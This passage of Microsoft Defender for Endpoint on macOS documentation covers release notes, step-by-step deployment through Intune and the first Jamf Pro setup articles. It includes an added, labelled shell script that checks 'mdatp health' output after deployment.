Addressed an issue seen on some M1 devices where the product was stuck with
invalid anti-malware definitions and couldn't successfully update to a working set
of definitions.
mdatp health output has been extended with an additional attribute called
full_disk_access_enabled that can be used to determine whether Full Disk Access
has been granted to all components of Microsoft Defender for Endpoint for Mac.
Performance improvements & bug fixes

Released: Jan 12, 2022
Published: Jan 12, 2022
Build: 101.54.16
Release version: 20.121111.15416.0

What's new

macOS 10.14 (Mojave) is no longer supported
After a product setting stops being managed by the administrator through MDM,
it now reverts to the value it had before it was managed (the value configured
locally by the end user or, if no such local value was explicitly provided, the default
value used by the product). Prior to this change, after a setting stopped being
managed, its managed value persisted and was still used by the product.
Performance improvements & bug fixes

Build: 101.49.25
Release version: 20.121092.14925.0

What's new

Added a new switch to the command-line tool to control whether archives are
scanned during on-demand scans. This can be configured through mdatp config
scan-archives --value [enabled/disabled]. By default, this is set to enabled.

Bug fixes

Build: 101.47.27
Release version: 20.121082.14727.0
What's new

Fix for a system freeze occurring on shutdown on macOS Mojave and macOS
Catalina.

Build: 101.43.84
Release version: 20.121082.14384.0

What's new

Candidate build for macOS 12 (Monterey)
Bug fixes

Build: 101.41.10
Release version: 20.121072.14110.0

What's new

Added new switches to the command-line tool:
Control degree of parallelism for on-demand scans. This can be configured
through mdatp config maximum-on-demand-scan-threads --value [number-between-1-and-64].
By default, a degree of parallelism of 2 is used.
Control whether scans after security intelligence updates are enabled or
disabled. This can be configured through mdatp config scan-after-definition-update
--value [enabled/disabled]. By default, this is set to enabled.
Changing the product log level now requires elevation.
Performance improvements & bug fixes

Build: 101.40.84
Release version: 20.121071.14084.0

What's new

M1 chip native support
Performance improvements & bug fixes

Build: 101.37.97
Release version: 20.121062.13797.0
What's new

Performance improvements & bug fixes

Build: 101.34.28
Release version: 20.121061.13428.0

What's new

Bug fixes

Build: 101.34.27
Release version: 20.121052.13427.0

What's new

Bug fixes

Build: 101.34.20
Release version: 20.121051.13420.0

What's new

Device control for macOS is now in general availability.
Addressed an issue where a quick scan couldn't be started from the status menu
on macOS 11 (Big Sur).
Other bug fixes

Build: 101.32.69
Release version: 20.121042.13269.0

What's new

Addressed an issue where concurrent access to the keychain from Microsoft
Defender for Endpoint and other applications can lead to keychain corruption.

Build: 101.29.64
Release version: 20.121042.12964.0
What's new

Starting with this version, threats detected during on-demand antivirus scans
triggered through the command-line client are automatically remediated. Threats
detected during scans triggered through the user interface still require manual
action.
mdatp diagnostic real-time-protection-statistics now supports two other
switches:
--sort: sorts the output descending by total number of files scanned
--top N: displays the top N results (only works if --sort is also specified)

Performance improvements (specifically for when YARN is used) & bug fixes

Build: 101.27.50
Release version: 20.121022.12750.0

What's new

Fix to accommodate for Apple certificate expiration for macOS Catalina and earlier.
This fix restores Microsoft Defender Vulnerability Management (MDVM)
functionality.

Build: 101.25.69
Release version: 20.121022.12569.0

What's new

Microsoft Defender for Endpoint on macOS is now available in preview for US
Government customers. For more information, see Microsoft Defender for
Endpoint for US Government customers.
Performance improvements (specifically for the situation when the XCode
Simulator app is used) & bug fixes.

Build: 101.23.64
Release version: 20.121021.12364.0

What's new

Added a new option to the command-line tool to view information about the last
on-demand scan. To view information about the last on-demand scan, run mdatp
health --details antivirus.

Performance improvements & bug fixes

Build: 101.22.79
Release version: 20.121012.12279.0

What's new

Performance improvements & bug fixes

Build: 101.19.88
Release version: 20.121011.11988.0

What's new

Performance improvements & bug fixes

Build: 101.19.48
Release version: 20.120121.11948.0

What's new

Note

The old command-line tool syntax has been deprecated with this release. For
information on the new syntax, see Resources.

Added a new command-line switch to disable the network extension: mdatp
system-extension network-filter disable. This command can be useful to
troubleshoot networking issues that could be related to Microsoft Defender for
Endpoint on Mac.
Performance improvements & bug fixes

Build: 101.19.21
Release version: 20.120101.11921.0

What's new
Bug fixes

Build: 101.15.26
Release version: 20.120102.11526.0

What's new

Improved the reliability of the agent when running on macOS 11 Big Sur.
Added a new command-line switch (--ignore-exclusions) to ignore AV exclusions
during custom scans (mdatp scan custom).
Performance improvements & bug fixes

Build: 101.13.75
Release version: 20.120101.11375.0

What's new

Removed conditions when Microsoft Defender for Endpoint was triggering a
macOS 11 (Big Sur) bug that manifests into a kernel panic.
Fixed a memory leak in the Endpoint Security system extension when running on
macOS 11 (Big Sur).
Bug fixes

Build: 101.10.72

What's new

Bug fixes

Build: 101.09.61

What's new

Added a new managed preference for disabling the option to send feedback.
Status menu icon now shows a healthy state when the product settings are
managed. Previously, the status menu icon was displaying a warning or error state,
even though the product settings were managed by the administrator.
Performance improvements & bug fixes

Build: 101.09.50

What's new

This product version has been validated on macOS Big Sur 11 preview 9.
The new syntax for the mdatp command-line tool is now the default one. For more
information on the new syntax, see Resources for Microsoft Defender for Endpoint
on macOS.

Note

The old command-line tool syntax will be removed from the product on January
1st, 2021.

Extended mdatp diagnostic create with a new parameter (--path [directory])
that allows the diagnostic logs to be saved to a different directory.
Performance improvements & bug fixes

Build: 101.09.49

What's new

User interface improvements to differentiate exclusions that are managed by the IT
administrator versus exclusions defined by the local user.
Improved CPU utilization during on-demand scans.
Performance improvements & bug fixes

Build: 101.07.23

What's new

Added new fields to the output of mdatp --health for checking the status of
passive mode and the EDR group ID.

Note

mdatp --health will be replaced with mdatp health in a future product update.

Fixed a bug where automatic sample submission wasn't marked as managed in the
user interface.
Added new settings for controlling the retention of items in the antivirus scan
history. You can now specify the number of days to retain items in the scan history
and specify the maximum number of items in the scan history.
Bug fixes

Build: 101.06.63

What's new

Addressed a performance regression introduced in version 101.05.17. The
regression was introduced with the fix to eliminate the kernel panics some
customers have observed when accessing SMB shares. We have reverted this code
change and are investigating alternative ways to eliminate the kernel panics.

Build: 101.05.17

What's new

Important

We are working on a new and enhanced syntax for the mdatp command-line tool.
The new syntax is currently the default in the Insider Fast and Insider Slow update
channels. We encourage you to familiarize yourself with this new syntax. We will
continue supporting the old syntax in parallel with the new syntax and will provide
more communication around the deprecation plan for the old syntax in the
upcoming months.

Addressed a kernel panic that occurred sometimes when accessing SMB file shares.
Performance improvements & bug fixes

Build: 101.05.16

What's new

Improvements to quick scan logic to significantly reduce the number of scanned
files.
Added autocompletion support for the command-line tool.
Bug fixes

Build: 101.03.12

What's new

Performance improvements & bug fixes

Build: 101.01.54

What's new

Improvements around compatibility with Time Machine
Accessibility improvements
Performance improvements & bug fixes

Build: 101.00.31

What's new

Improved product onboarding experience for Intune users
Antivirus exclusions now support wildcards
Added the ability to trigger antivirus scans from the macOS contextual menu. You
can now right-click a file or a folder in Finder and select Scan with Microsoft
Defender for Endpoint.
In-place product downgrades are now explicitly disallowed by the installer. If you
need to downgrade, first uninstall the existing version and reconfigure your device.
Other performance improvements & bug fixes

Build: 100.90.27

What's new

You can now set an update channel for Microsoft Defender for Endpoint on macOS
that is different from the system-wide update channel.
New product icon
Other user experience improvements
Bug fixes

Build: 100.86.92

What's new

Improvements around compatibility with Time Machine
Addressed an issue where the product was sometimes not cleaning all files under
/Library/Application Support/Microsoft/Defender during uninstallation.

Reduced the CPU utilization of the product when Microsoft products are updated
through Microsoft AutoUpdate.
Other performance improvements & bug fixes

Build: 100.86.91

What's new

Caution

To ensure the most complete protection for your macOS devices and in alignment
with Apple stopping delivery of macOS native security updates to OS versions older
than [current - 2], MDATP for Mac deployment and updates will no longer be
supported on macOS Sierra [10.12]. MDATP for Mac updates and enhancements
will be delivered to devices running versions Catalina [10.15], Mojave [10.14], and
High Sierra [10.13].

If you already have MDATP for Mac deployed to your Sierra [10.12] devices, please
upgrade to the latest macOS version to eliminate risks of losing protection.

Performance improvements & bug fixes

Build: 100.83.73

What's new

Added more controls for IT administrators around management of exclusions,
management of threat type settings, and disallowed threat actions.
When Full Disk Access isn't enabled on the device, a warning is now displayed in
the status menu.
Performance improvements & bug fixes

Build: 100.82.60

What's new

Addressed an issue where the product fails to start following a definition update.

Build: 100.80.42

What's new

Bug fixes

Build: 100.79.42

What's new

Fixed an issue where Microsoft Defender for Endpoint on Mac was sometimes
interfering with Time Machine.

Added a new switch to the command-line utility for testing the connectivity with
the backend service

Bash

mdatp connectivity test

Added ability to view the full threat history in the user interface (can be accessed
from the Protection history view).

Performance improvements & bug fixes

Build: 100.72.15

What's new

Bug fixes
Build: 100.70.99

What's new

Addressed an issue that impacts the ability of some users to upgrade to macOS
Catalina when real-time protection is enabled. This sporadic issue was caused by
Microsoft Defender for Endpoint locking files within Catalina upgrade package
while scanning them for threats, which led to failures in the upgrade sequence.

Build: 100.68.99

What's new

Added the ability to configure the antivirus functionality to run in passive mode.
Performance improvements & bug fixes

Build: 100.65.28

What's new

Added support for macOS Catalina.

Caution

macOS 10.15 (Catalina) contains new security and privacy enhancements. Beginning
with this version, by default, applications are not able to access certain locations on
disk (such as Documents, Downloads, Desktop, etc.) without explicit consent. In the
absence of this consent, Microsoft Defender for Endpoint is not able to fully protect
your device.

The mechanism for granting this consent depends on how you deployed Microsoft
Defender for Endpoint:

For manual deployments, see the updated instructions in the Manual deployment topic.
For managed deployments, see the updated instructions in the JAMF-based
deployment and Microsoft Intune-based deployment topics.

Performance improvements & bug fixes


Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Deploy Microsoft Defender for Endpoint
on macOS with Microsoft Intune
Article • 12/08/2023

Applies to:

Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

This article describes how to deploy Microsoft Defender for Endpoint on macOS through
Microsoft Intune. A successful deployment requires the completion of all of the
following steps:

1. Approve system extension
2. Network Filter
3. Full Disk Access
4. Background services
5. Notifications
6. Accessibility settings
7. Microsoft AutoUpdate
8. Microsoft Defender for Endpoint configuration settings
9. Network protection for Microsoft Defender for Endpoint on macOS
10. Device control for Microsoft Defender for Endpoint on macOS
11. Data Loss Prevention for Endpoint
12. Check status of the PList(.mobileconfig)
13. Publish application
14. Download the onboarding package
15. Deploy the onboarding package

Prerequisites and system requirements


Before you get started, see the main Microsoft Defender for Endpoint on macOS page
for a description of prerequisites and system requirements for the current software
version.

Overview
The following table summarizes the steps you would need to take to deploy and
manage Microsoft Defender for Endpoint on Macs, via Microsoft Intune. See the
following table for more detailed steps.

Step | Sample file name | Bundle identifier
Approve system extension | sysext.mobileconfig | N/A
Network extension policy | netfilter.mobileconfig | N/A
Full Disk Access | fulldisk.mobileconfig | com.microsoft.wdav.epsext
Microsoft Defender for Endpoint configuration settings (Note: if you're planning to run a third-party AV for macOS, set passiveMode to true.) | MDE_MDAV_and_exclusion_settings_Preferences.xml | com.microsoft.wdav
Background services | background_services.mobileconfig | N/A
Configure Microsoft Defender for Endpoint notifications | notif.mobileconfig | com.microsoft.wdav.tray
Accessibility settings | accessibility.mobileconfig | com.microsoft.dlp.daemon
Configure Microsoft AutoUpdate (MAU) | com.microsoft.autoupdate2.mobileconfig | com.microsoft.autoupdate2
Device Control | DeviceControl.mobileconfig | N/A
Data Loss Prevention | DataLossPrevention.mobileconfig | N/A
Download the onboarding package | WindowsDefenderATPOnboarding__MDATP_wdav.atp.xml | com.microsoft.wdav.atp
Deploy the Microsoft Defender for Endpoint on macOS application | Wdav.pkg | N/A

Create system configuration profiles


The next step is to create system configuration profiles that Microsoft Defender for
Endpoint needs. In the Microsoft Intune admin center , open Devices > Configuration
profiles.

Step 1: Approve system extensions


1. In Microsoft Defender portal, go to Settings > Endpoints > Device management
> Onboarding.

This profile is needed for Big Sur (11) or later. It is ignored on older macOS since
they use the kernel extension.

2. Under Configuration profiles, select Create Profile.

3. Under Platform, select macOS.

4. Under Profile type, select Templates.

5. Under Template name, select Extensions.

6. Click Create.

7. On the Basics tab, Name the profile. For example, 'SysExt-prod-macOS-Default-
MDE'.
8. Click Next.

9. On the Configuration settings tab, expand System Extensions and add the
following entries in the Allowed system extensions section:

Bundle identifier | Team identifier
com.microsoft.wdav.epsext | UBF8T346G9
com.microsoft.wdav.netext | UBF8T346G9

10. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.

11. Review the configuration profile. Click Create.

Step 2: Network filter


As part of the Endpoint Detection and Response capabilities, Microsoft Defender for
Endpoint on macOS inspects socket traffic and reports this information to the Microsoft
365 Defender portal. The following policy allows the network extension to perform this
functionality.

Download netfilter.mobileconfig from GitHub repository .

To configure network filter:

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'NetFilter-prod-macOS-Default-
MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'NetFilter-prod-macOS-Default-MDE'.
9. Choose a Deployment channel.
10. Click Next.
11. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
12. Review the configuration profile. Click Create.

Step 3: Full Disk Access

Note

Starting with macOS Catalina (10.15), Apple introduced Full Disk Access (FDA) to protect
end-user privacy. Granting the TCC (Transparency, Consent & Control) permission through
a Mobile Device Management solution such as Intune eliminates the risk of Defender for
Endpoint losing the Full Disk Access authorization it needs to function properly.

This configuration profile grants Full Disk Access to Microsoft Defender for
Endpoint. If you previously configured Microsoft Defender for Endpoint through
Intune, we recommend you update the deployment with this configuration profile.

Download fulldisk.mobileconfig from GitHub repository .

To configure Full Disk Access:

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'FullDiskAccess-prod-macOS-
Default-MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Fulldisk.mobileconfig'.
9. Choose a Deployment channel.
10. Click Next.
11. Select a Configuration profile file.
12. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
13. Review the configuration profile. Click Create.

Step 4: Background services

Caution

macOS 13 (Ventura) contains new privacy enhancements. Beginning with this
version, by default, applications cannot run in background without explicit consent.
Microsoft Defender for Endpoint must run its daemon process in background.

This configuration profile grants Background Service permissions to Microsoft
Defender for Endpoint. If you previously configured Microsoft Defender for
Endpoint through Microsoft Intune, we recommend you update the deployment
with this configuration profile.

Download background_services.mobileconfig from GitHub repository .

To configure background services:

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'FullDiskAccess-prod-macOS-
Default-MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Fulldisk.mobileconfig'.
9. Choose a Deployment channel.
10. Click Next.
11. Select a Configuration profile file.
12. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
13. Review the configuration profile. Click Create.

Step 5: Notifications
This profile is used to allow Microsoft Defender for Endpoint on macOS and Microsoft
AutoUpdate to display notifications in UI.

Download notif.mobileconfig from GitHub repository .

To turn off notifications for the end users, you can change 'Show NotificationCenter'
from 'true' to 'false' in notif.mobileconfig .

To configure notifications:

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'FullDiskAccess-prod-macOS-
Default-MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Notification.mobileconfig'.
9. Choose a Deployment channel.
10. Click Next.
11. Select a Configuration profile file.
12. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
13. Review the configuration profile. Click Create.

Step 6: Accessibility settings


This profile is used to allow Microsoft Defender for Endpoint on macOS to access the
accessibility settings on Apple macOS High Sierra (10.13.6) and newer.

Download accessibility.mobileconfig from GitHub repository .

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'Accessibility-prod-macOS-
Default-MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Accessibility.mobileconfig'.
9. Choose a Deployment channel.
10. Click Next.
11. Select a Configuration profile file.
12. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
13. Review the configuration profile. Click Create.

Step 7: Microsoft AutoUpdate


This profile is used to update the Microsoft Defender for Endpoint on macOS via
Microsoft AutoUpdate (MAU). If you're deploying Microsoft Defender for Endpoint on
macOS, you have the options to get an updated version of the application (Platform
Update) that are in the different channels mentioned here:

Beta (Insiders-Fast)
Current channel (Preview, Insiders-Slow)
Current channel (Production)

For more information, see Deploy updates for Microsoft Defender for Endpoint on
macOS.

Download AutoUpdate2.mobileconfig from GitHub repository .

Note

The sample AutoUpdate2.mobileconfig from the GitHub repository has it set to
Current Channel (Production).

1. Under Configuration profiles, select Create Profile.
2. Under Platform, select macOS.
3. Under Profile type, select Templates.
4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'Autoupdate-prod-macOS-
Default-MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Autoupdate.mobileconfig'.
9. Choose a Deployment channel.
10. Click Next.
11. Select a Configuration profile file.
12. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
13. Review the configuration profile. Click Create.

Step 8: Microsoft Defender for Endpoint configuration settings

In this step, we'll go over the Preferences, which enable you to configure anti-
malware and EDR policies using the Microsoft Defender portal and Microsoft Intune.

Set policies using Microsoft Defender portal

Go through Configure Microsoft Defender for Endpoint in Intune before setting the
security policies using Microsoft Defender.
In the Microsoft Defender portal :

1. Go to Configuration management > Endpoint security policies > Mac policies >
Create new policy.
2. Under Select Platform, select macOS.
3. Under Select Template, choose a template and click Create Policy.
4. Enter the Name and Description of the policy.
5. Click Next.
6. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.

For more information about managing security settings, see:

Manage Microsoft Defender for Endpoint on devices with Microsoft Intune
Manage security settings for Windows, macOS, and Linux natively in Defender for
Endpoint

Set policies using Microsoft Intune


You can manage the security settings for Microsoft Defender for Endpoint on macOS
under Setting Preferences in Microsoft Intune.

For more information, see Set preferences for Microsoft Defender for Endpoint on Mac.

Step 9: Network protection for Microsoft Defender for Endpoint on macOS
In the Microsoft Defender portal :

1. Go to Configuration management > Endpoint security policies > Mac policies >
Create new policy.

2. Under Select Platform, select macOS.

3. Under Select Template, select Microsoft Defender Antivirus and click Create
Policy.

4. On the Basics tab, enter the Name and Description of the policy. Click Next.

5. On the Configuration Settings tab, under Network Protection, select an
Enforcement level. Click Next.

6. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.

7. Review the policy in Review+Create and click Save.


Tip

You can also configure network protection by appending the information from
Network protection to help prevent macOS connections to bad sites to the
.mobileconfig from step 8.

Step 10: Device Control for Microsoft Defender for Endpoint on macOS
To set Device Control for Microsoft Defender for Endpoint on macOS, follow the steps
in:

Device Control for macOS
Deploy and manage Device Control using Intune

Step 11: Data Loss Prevention (DLP) for Endpoint


To set Purview's Data Loss Prevention (DLP) for endpoint on macOS, follow the steps in
Onboard and offboard macOS devices into Compliance solutions using Microsoft
Intune.

Step 12: Check status of PList(.mobileconfig)


After completing the profile configuration, you'll be able to review the status of the
policies.

View Status

Once the Intune changes are propagated to the enrolled devices, you can see them
listed under Monitor > Device status:

Client device setup


A standard Company Portal installation is sufficient for a mac device.

1. Confirm device management.

Select Open System Preferences, locate Management Profile on the list, and
select Approve.... Your Management Profile would be displayed as Verified:


2. Select Continue and complete the enrollment.

You may now enroll more devices. You can also enroll them later, after finishing the
provisioning system configuration and application packages.

3. In Intune, open Manage > Devices > All devices. Here you can see your device
among the listed:

Verify client device state

1. After the configuration profiles are deployed to your devices, open System
Preferences > Profiles on your Mac device.

2. Verify that the following configuration profiles are present and installed. The
Management Profile should be the Intune system profile. Wdav-config and wdav-
kext are system configuration profiles that were added in Intune:


3. You should also see the Microsoft Defender for Endpoint icon in the top-right
corner.

Step 13: Publish application


This step enables deploying Microsoft Defender for Endpoint to enrolled machines.

1. In the Microsoft Intune admin center , open Apps.

2. Select By platform > macOS > Add.

3. Under App type, select macOS. Click Select.


4. On the App information, keep the default values and click Next.

5. On the Assignments tab, click Next.


6. Review and Create. You can visit Apps > By platform > macOS to see it on the list
of all applications.

For more information, see Add Microsoft Defender for Endpoint to macOS devices using
Microsoft Intune.

Important
You should create and deploy the configuration profiles in the above order (step 1-
13) for a successful system configuration.

Step 14: Download the onboarding package

To download the onboarding packages from Microsoft 365 Defender portal:

1. In the Microsoft 365 Defender portal, go to Settings > Endpoints > Device
management > Onboarding.

2. Set the operating system to macOS and the deployment method to Mobile Device
Management / Microsoft Intune.

3. Select Download onboarding package. Save it as
WindowsDefenderATPOnboardingPackage.zip to the same directory.

4. Extract the contents of the .zip file:

Bash

unzip WindowsDefenderATPOnboardingPackage.zip

Console

Archive: WindowsDefenderATPOnboardingPackage.zip
warning: WindowsDefenderATPOnboardingPackage.zip appears to use
backslashes as path separators
inflating: intune/kext.xml
inflating: intune/WindowsDefenderATPOnboarding.xml
inflating: jamf/WindowsDefenderATPOnboarding.plist

Step 15: Deploy the onboarding package


This profile contains license information for Microsoft Defender for Endpoint, without
which it is reported as not licensed.

To deploy the onboarding package:

1. Under Configuration profiles, select Create Profile.

2. Under Platform, select macOS.

3. Under Profile type, select Templates.

4. Under Template name, select Custom.

5. Click Create.

6. On the Basics tab, Name the profile. For example, 'Autoupdate-prod-macOS-
Default-MDE'. Click Next.

7. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'Autoupdate.mobileconfig'.

8. Choose a Deployment channel.

9. Click Next.

10. Select a Configuration profile file.

11. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.

12. Review the configuration profile. Click Create.

13. Open Devices > Configuration profiles to see the created profile.

Step 16: Verify anti-malware detection


See the following article to test for an anti-malware detection review: AV detection test
for verifying device's onboarding and reporting services

Step 17: Verifying EDR detection


See the following article to test for an EDR detection review: EDR detection test for
verifying device onboarding and reporting services
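Once the device is enrolled and the profiles above have applied, the quickest confirmation that steps 1 through 3 and the onboarding package took effect is the output of mdatp health. The following script is an added example, not part of the Microsoft docs or the mdatp-xplat repository; it assumes the field names that mdatp health prints on current builds (confirm them against your own output), and both sample outputs are constructed.

```shell
#!/bin/sh
# Added example, not from the Microsoft docs or the mdatp-xplat repository:
# a post-deployment check for Defender for Endpoint on macOS. It parses the
# "key : value" lines printed by `mdatp health` and verifies that licensing
# and the profiles from steps 1-3 (system extensions, network filter, Full
# Disk Access) actually took effect on the device.
# Assumption: the field names below are the ones `mdatp health` prints on
# current builds; confirm them against your own output before relying on this.

# Constructed sample of a healthy, fully configured device (trimmed).
SAMPLE_HEALTHY='healthy                        : true
licensed                       : true
org_id                         : "<org-id-placeholder>"
release_ring                   : "Production"
passive_mode_enabled           : false
real_time_protection_enabled   : true
real_time_protection_subsystem : "endpoint_security_extension"
network_events_subsystem       : "network_filter_extension"
full_disk_access_enabled       : true
edr_group_ids                  : ""'

# Constructed sample of a device whose onboarding profile never arrived and
# whose system extension and Full Disk Access profiles were not approved.
SAMPLE_BROKEN='healthy                        : false
licensed                       : false
passive_mode_enabled           : true
real_time_protection_enabled   : true
real_time_protection_subsystem : "kernel_extension"
network_events_subsystem       : "none"
full_disk_access_enabled       : false'

# health_field OUTPUT KEY: print the value of KEY with its quotes removed,
# or nothing when the key is absent.
health_field() {
    printf '%s\n' "$1" | awk -v k="$2" '
        $1 == k {
            sub(/^[^:]*: */, "")   # drop the "key :" prefix, keep the whole value
            gsub(/"/, "")          # strip the quotes mdatp puts around strings
            print
            exit
        }'
}

# require_field KEY VALUE MESSAGE: compare one field of $out; on mismatch
# print a FAIL line and record it in $rc.
require_field() {
    [ "$(health_field "$out" "$1")" = "$2" ] || { echo "FAIL: $3"; rc=1; }
}

# check_health OUTPUT [ALLOW_PASSIVE]: return 0 when every check passes,
# otherwise print one FAIL line per problem and return 1. Pass ALLOW_PASSIVE=1
# only when a third-party AV is in use and passiveMode was set to true in step 8.
check_health() {
    out=$1
    allow_passive=${2:-0}
    rc=0
    require_field healthy true "agent reports unhealthy; inspect health_issues in 'mdatp health'"
    require_field licensed true "not licensed: onboarding profile missing (see Troubleshooting)"
    require_field full_disk_access_enabled true "Full Disk Access not granted (step 3 profile)"
    require_field real_time_protection_subsystem endpoint_security_extension \
        "endpoint security system extension not active (step 1 profile)"
    require_field network_events_subsystem network_filter_extension \
        "network filter extension not active (step 2 profile)"
    if [ "$allow_passive" != 1 ]; then
        require_field passive_mode_enabled false "passive mode is on, so Defender AV is not blocking threats"
    fi
    return "$rc"
}

# Usage: sh mde_health_check.sh --live [ALLOW_PASSIVE]  checks this Mac via mdatp
#        sh mde_health_check.sh                         checks the constructed sample
case "${1:-}" in
    --live) check_health "$(mdatp health)" "${2:-0}" ;;
    *)      check_health "$SAMPLE_HEALTHY" ;;
esac
```

Run it with --live on an enrolled Mac; a non-zero exit with FAIL lines tells you which profile or onboarding step to revisit.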

Troubleshooting
Issue: No license found.

Solution: Follow the steps in this article to create a device profile using
WindowsDefenderATPOnboarding.xml.

Logging installation issues


See Logging installation issues for information on how to find the automatically
generated log created by the installer, when an error occurs.

For information on troubleshooting procedures, see:

Troubleshoot system extension issues in Microsoft Defender for Endpoint on
macOS
Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS
Troubleshoot license issues for Microsoft Defender for Endpoint on macOS
Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on
macOS
Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS

Uninstallation
See Uninstalling for details on how to remove Microsoft Defender for Endpoint on
macOS from client devices.
Recommended content
Add Microsoft Defender for Endpoint to macOS devices using Microsoft Intune
Learn about adding Microsoft Defender for Endpoint to macOS devices using Microsoft
Intune.

Examples of device control policies for Intune


Learn how to use device control policies using examples that can be used with Intune.

Configure Microsoft Defender for Endpoint on iOS features


Describes how to deploy Microsoft Defender for Endpoint on iOS features.

Deploy Microsoft Defender for Endpoint on iOS with Microsoft Intune


Describes how to deploy Microsoft Defender for Endpoint on iOS using an app.

Configure Microsoft Defender for Endpoint in Microsoft Intune


Describes connecting to Defender for Endpoint, onboarding devices, assigning
compliance for risk levels, and conditional access policies.

Troubleshoot issues and find answers on FAQs related to Microsoft Defender for
Endpoint on iOS
Troubleshooting and FAQ - Microsoft Defender for Endpoint on iOS.

Configure Microsoft Defender for Endpoint on Android features


Describes how to configure Microsoft Defender for Endpoint on Android.

Manage Defender for Endpoint on Android devices in Intune - Azure


Configure Microsoft Defender for Endpoint web protection on Android devices
managed by Microsoft Intune.


Deploying Microsoft Defender for
Endpoint on macOS with Jamf Pro
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.

Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

This is a multi-step process. You'll need to complete all of the following steps:

Login to the Jamf Portal
Setup the Microsoft Defender for Endpoint on macOS device groups in Jamf Pro
Setup the Microsoft Defender for Endpoint on macOS policies in Jamf Pro
Enroll the Microsoft Defender for Endpoint on macOS devices into Jamf Pro

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.


Sign in to Jamf Pro
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

1. Enter your credentials.

2. Select Computers.

3. You see the settings that are available.

Next step
Setup the device groups in Jamf Pro


Set up Microsoft Defender for Endpoint
on macOS device groups in Jamf Pro
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Set up the device groups similar to Group Policy organizational units (OUs), Microsoft
Endpoint Configuration Manager's device collections, and Intune's device groups.

1. Navigate to Static Computer Groups.

2. Select New.

3. Provide a display name and select Save.

4. Now you will see the Contoso's Machine Group under Static Computer Groups.

Note

You are not required to use static groups. It is often more convenient and flexible
to use e.g. JAMF Pro's smart groups instead.

Next step
Set up Microsoft Defender for Endpoint on macOS policies in Jamf Pro


Set up the Microsoft Defender for
Endpoint on macOS policies in Jamf Pro
Article • 02/07/2023

Applies to:

Defender for Endpoint on Mac


Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This page will guide you through the steps you need to take to set up macOS policies in
Jamf Pro.

You'll need to take the following steps:

1. Get the Microsoft Defender for Endpoint onboarding package
2. Create a configuration profile in Jamf Pro using the onboarding package
3. Configure Microsoft Defender for Endpoint settings
4. Configure Microsoft Defender for Endpoint notification settings
5. Configure Microsoft AutoUpdate (MAU)
6. Grant full disk access to Microsoft Defender for Endpoint
7. Approve System extensions for Microsoft Defender for Endpoint
8. Configure Network Extension
9. Configure Background Services
10. Schedule scans with Microsoft Defender for Endpoint on macOS
11. Deploy Microsoft Defender for Endpoint on macOS

Step 1: Get the Microsoft Defender for Endpoint onboarding package
1. In Microsoft Defender XDR , navigate to Settings > Endpoints > Onboarding.

2. Select macOS as the operating system and Mobile Device Management / Microsoft
Intune as the deployment method.

